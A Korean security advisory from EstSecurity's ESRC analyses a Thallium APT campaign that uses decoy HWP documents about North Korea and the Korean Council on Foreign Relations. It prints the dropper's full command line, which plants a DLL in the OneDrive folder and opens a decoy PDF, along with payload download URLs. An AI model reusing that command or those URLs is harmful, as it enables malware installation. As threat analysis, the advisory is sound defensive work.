10월 북한 내부정보로 현혹하는 탈륨 해킹 조직의 APT 공격

안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터)입니다.

마치 북한의 최근 내부 소식인 듯 현혹하는 악성 HWP 문서 파일 공격이 발견돼 각별한 주의가 필요합니다.

문서를 실행하면 깨진 글자 들이 보여지며 "호환 문서" 메세지 박스를 출력 합니다. 

[그림 1] HWP 실행 화면

만약 사용자가 문서를 확인하기 위해 프로그램을 선택하면 [그림 2]와 같은 보안 경고 화면을 출력해 한번 더 사용자의 클릭을 유도합니다. 

[그림 2] 보안 경고 화면

만약 사용자가 “열기”를 클릭하면 %temp%아래 "호환 문서 프로그램 실행.lnk", "qwer1234.txt" “qwer1234.tmp”파일들이 드롭되고 명령어가 실행됩니다.

%comspec% /c cd "%userprofile%\AppData\Local\Temp\" & copy qwer1234.txt "%userprofile%\AppData\Local\Microsoft\OneDrive\version.dll" & ren qwer1234.tmp file4.pdf & start file4.pdf & taskkill /im hwp.exe /f

사용자들에게는 북한 내부 소식의 내용으로 아래와 같은 화면이 보여집니다.

[그림 3] 실행 파일 화면

한편 호환 문서 프로그램 실행.lnk 바로가기에서 공격자의 악성 파일 제작 폴더 경로를 남긴 흔적이 발견되었습니다. 

W:\공격방안\보프\침투방안\2020\0904\spy\hwp

[그림 3] 악성 파일에 남겨진 공격자의 악성 파일 제작 폴더 경로 화면

드롭된 qwer1234.txt 파일은 PE 파일로 추가 파일 다운로드 후 실행 합니다.  그러나 현재는 연결되지 않습니다.

https://drive.google.com/file/d/1X4hJhlAjqVk7cChNSBt_SCrTi07LMVN7/view?usp=sharing

[그림 4] 추가 파일 다운로드 및 실행 코드

10월 22일 한국외교협회를 사칭한 추가 파일이 발견되었습니다. 동작과 악성코드 기능은 위에 언급한 파일과 유사합니다. 

[그림 5] 한국 외교협회를 사칭한 추가 파일

https://onedrive.live.com/?authkey=%21AGAfXKe2v%2DBamy4&cid=5007FC7EF59949DB&id=5007FC7EF59949DB%21132&parId=root&o=OneUp

 

[그림 6] 추가 발견된 코드 화면

북한의 내부 소식이나 한국 외교협회를 사칭한 악성코드들이 발견되고 있습니다. 따라서 출처가 불분명한 파일을 확인할 경우 신중을 기해야 하며 백신 업데이트 최신화와 정기 검사를 습관화하여야 합니다.

현재 알약에서는 ‘Exploit.HWP.Agent’ , ‘Trojan.Agent.99328C’ 으로 탐지 중입니다.